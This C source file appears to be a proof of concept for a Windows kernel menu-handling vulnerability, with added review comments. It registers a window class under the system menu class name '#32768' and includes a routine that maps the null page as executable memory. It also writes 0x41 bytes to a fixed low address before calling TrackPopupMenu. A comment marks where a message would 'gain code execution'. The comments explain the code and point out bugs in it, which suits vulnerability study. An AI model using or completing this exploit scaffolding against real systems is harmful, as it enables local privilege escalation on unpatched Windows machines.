#include <windows.h>
#include<stdio.h>
// Window class name registered in WinMain and used for CreateWindow.
// NOTE(review): "#32768" is also the name Windows uses for its built-in menu
// window class; registering an application class under that name looks
// deliberate for this PoC — confirm against the author's write-up.
#define THIS_CLASSNAME "#32768"
// Command identifiers of the two items ShowPopupMenu inserts into the popup menu.
#define ID_ABOUT 2000
#define ID_EXIT 2001
// TRUE while a message box is shown; read in ShowPopupMenu, never written
// anywhere in this file.
static BOOL g_bModalState = FALSE; //Is messagebox shown
// NTSTATUS values >= 0 are success (or informational/warning) codes; negative
// values are errors.
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
// Function-pointer type for ntdll!NtAllocateVirtualMemory, resolved at run
// time with GetProcAddress in AllocNullPage. BaseAddress and RegionSize are
// in/out parameters; RegionSize is a PSIZE_T (pointer-sized), which callers
// must match exactly.
typedef
NTSTATUS
(NTAPI *NtAllocateVirtualMemory_t)(
    __in HANDLE ProcessHandle,
    __inout PVOID *BaseAddress,
    __in ULONG_PTR ZeroBits,
    __inout PSIZE_T RegionSize,
    __in ULONG AllocationType,
    __in ULONG Protect
    );
// Commits one 4096-byte page of PAGE_EXECUTE_READWRITE memory in the current
// process by calling ntdll!NtAllocateVirtualMemory directly with
// BaseAddress = 1 — which, going by the function's name, is meant to land in
// the page at address 0. Every failure path calls exit(1); nothing is returned.
// Currently dead code: the only call site (in ShowPopupMenu) is commented out.
//
// NOTE(review): a user-mode request to commit address 0 as RWX is a
// well-known null-page-mapping indicator; this is the observable a detection
// rule would key on.
void AllocNullPage()
{
    HMODULE h;
    HANDLE hProc;
    PVOID addr;
    // NOTE(review): the typedef declares RegionSize as PSIZE_T, but &size is a
    // ULONG*. On a 64-bit build the callee writes 8 bytes through a pointer to
    // a 4-byte local — stack corruption / undefined behaviour. Should be SIZE_T.
    ULONG size;
    NTSTATUS st;
    size = 4096;
    addr = (PVOID)1;
    // exit() is used below but <stdlib.h> is not included directly; it is only
    // reached transitively through <windows.h>/<stdio.h>.
    h = LoadLibraryA("ntdll.dll");
    if (!h)
    {
        exit(1);
    }
    NtAllocateVirtualMemory_t NtAllocateVirtualMemory;
    NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(h, "NtAllocateVirtualMemory");
    if (!NtAllocateVirtualMemory)
    {
        exit(1);
    }
    // GetCurrentProcess() returns a pseudo-handle, so this NULL check is
    // effectively dead.
    hProc = GetCurrentProcess();
    if (!hProc)
    {
        exit(1);
    }
    // On return addr holds the actual base address and size the rounded region
    // size; neither is inspected here.
    st = NtAllocateVirtualMemory(hProc, &addr, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!NT_SUCCESS(st))
    {
        exit(1);
    }
}
// Builds a two-item popup menu for hWnd and tracks it at *curpos, or at the
// current cursor position when curpos is NULL. Immediately before
// TrackPopupMenu it writes eight 0x41 bytes to the fixed address 0x00010003;
// nothing in this file maps that address (the AllocNullPage call is commented
// out, and it would only cover the page at 0), so in an ordinary process that
// write raises an access violation. Presumably this sequence is the crash the
// PoC demonstrates — confirm against the author's write-up.
//
// Returns FALSE when g_bModalState is set. On the normal path the function
// falls off the end of a BOOL function with no return statement (undefined
// behaviour); the only caller, WinMain, ignores the value.
//
// NOTE(review): hPop is created before the g_bModalState check and is never
// passed to DestroyMenu, so the menu handle leaks on both paths. wDefaultItem
// and cmd are unused, and the GetCursorPos return value is not checked.
BOOL ShowPopupMenu( HWND hWnd, POINT *curpos, int wDefaultItem )
{
    //ADD MENU ITEMS.------------------------------------------------------------------
    HMENU hPop = CreatePopupMenu();
    if ( g_bModalState ) { return FALSE; }
    InsertMenu( hPop, 0, MF_BYPOSITION | MF_STRING, ID_ABOUT, "About..." );
    InsertMenu( hPop, 1, MF_BYPOSITION | MF_STRING, ID_EXIT , "Exit" );
    //CAN DO WITHOUT STUFF.------------------------------------------------------------
    SetMenuDefaultItem( hPop, ID_ABOUT, FALSE );
    SetFocus ( hWnd );
    // WM_INITMENUPOPUP is sent by hand here; with TPM_NONOTIFY below,
    // TrackPopupMenu itself will not send the usual menu notifications.
    SendMessage ( hWnd, WM_INITMENUPOPUP, (WPARAM)hPop, 0 );
    POINT pt;
    if (!curpos)
    {
        GetCursorPos( &pt );
        curpos = &pt;
    }
    //AllocNullPage();
    // Deliberate write to a fixed, unmapped low address (see header comment).
    memset((void*)0x00010003,'\x41',8);
    // TPM_RETURNCMD: the selected command id is returned instead of posted.
    WORD cmd = TrackPopupMenu( hPop, TPM_LEFTALIGN | TPM_RIGHTBUTTON | TPM_RETURNCMD | TPM_NONOTIFY, curpos->x, curpos->y, 0, hWnd, NULL );
    // Send message to gain code execution : SendMessage( hWnd, NULL, NULL, 0 );
}
// Window procedure for the PoC window. No message is handled here; everything
// is forwarded unchanged to DefWindowProc and its result returned as-is.
static LRESULT CALLBACK WndProc( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
    LRESULT defaultResult = DefWindowProc( hWnd, uMsg, wParam, lParam );
    return defaultResult;
}
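// Entry point of the PoC: registers a window class named THIS_CLASSNAME,
// creates a visible top-level window of that class and immediately opens the
// popup menu via ShowPopupMenu. There is no message loop; the function returns
// as soon as ShowPopupMenu returns (TrackPopupMenu runs its own modal loop),
// and the window is torn down at process exit.
//
// Returns 1 when the window cannot be created, 0 otherwise. The original fell
// off the end of a non-void function; the explicit `return 0;` makes the
// process exit code defined.
//
// NOTE(review): TEXT("...") is mixed with plain narrow literals (THIS_CLASSNAME,
// "Can't create window!"), so this only compiles as a non-UNICODE (ANSI) build.
int WINAPI WinMain( HINSTANCE hInst, HINSTANCE prev, LPSTR cmdline, int show )
{
    WNDCLASSEX wclx;
    memset(&wclx, 0, sizeof(wclx));
    wclx.cbSize = sizeof( wclx );
    wclx.style = 0;
    wclx.lpfnWndProc = &WndProc;
    wclx.cbClsExtra = 0;
    wclx.cbWndExtra = 0;
    wclx.hInstance = hInst;
    wclx.hCursor = LoadCursor( NULL, IDC_ARROW );
    wclx.hbrBackground = (HBRUSH)( COLOR_BTNFACE + 1 );
    wclx.lpszMenuName = NULL;
    wclx.lpszClassName = THIS_CLASSNAME;
    // NOTE(review): the ATOM returned by RegisterClassEx is not checked. If
    // registration fails, CreateWindow below still runs with the same class
    // name and presumably resolves to whatever class "#32768" already names.
    // Left unchanged because the PoC may depend on that — confirm before
    // adding a bail-out here.
    RegisterClassEx( &wclx );
    //CREATE WINDOW.----------------------------------------------------------------------------
    HWND hWnd = CreateWindow( THIS_CLASSNAME, TEXT("Title"), WS_OVERLAPPEDWINDOW | WS_VISIBLE, 100, 100, 250, 150, NULL, NULL, hInst, NULL );
    if ( !hWnd )
    {
        MessageBox(NULL, "Can't create window!", TEXT("Warning!"), MB_ICONERROR | MB_OK | MB_TOPMOST);
        return 1;
    }
    // curpos = NULL: ShowPopupMenu queries the cursor position itself.
    // The third argument is unused by ShowPopupMenu.
    ShowPopupMenu(hWnd, NULL, -1 );
    return 0;
}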